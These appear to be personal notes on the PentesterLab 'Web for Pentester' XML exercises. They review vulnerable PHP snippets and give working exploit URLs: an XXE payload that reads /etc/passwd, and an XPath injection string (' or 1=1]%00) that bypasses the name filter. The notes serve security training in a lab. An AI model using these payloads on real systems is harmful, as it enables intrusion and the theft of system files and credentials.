Pentesterlab--Web for Pentester-XML

Web for Pentester: This exercise is a set of the most common web vulnerabilities

Difficluty: 1/5

OWASP: Testing for XML Injection

Example 1

code review

example1.php
1
2
3
4

<?php
  $xml=simplexml_load_string($_GET['xml']);
  print_r((string)$xml);
?>

XML injection point search:

ZAP add fuzzing file:

https://wfuzz.googlecode.com/svn/trunk/wordlist/Injections/XML.txt

exploit:

http://192.168.79.162/xml/example1.php?xml=<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>

!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo> needed to be encoded.

Example 2

code review

example2.php
1
2
3
4
5
6
7
8

 $x = "<data><users><user><name>hacker</name><message>Hello hacker</message><password>pentesterlab</password></user><user><name>admin</name><message>Hello admin</message><password>s3cr3tP4ssw0rd</password></user></users></data>";

  $xml=simplexml_load_string($x);
  $xpath = "users/user/name[.='".$_GET['name']."']/parent::*/message";
  $res = ($xml->xpath($xpath));
  while(list( ,$node) = each($res)) {
      echo $node;
  }

exploit:

http://192.168.79.162/xml/example2.php?name=' or 1=1]%00

pentesterlab, web pentest, xml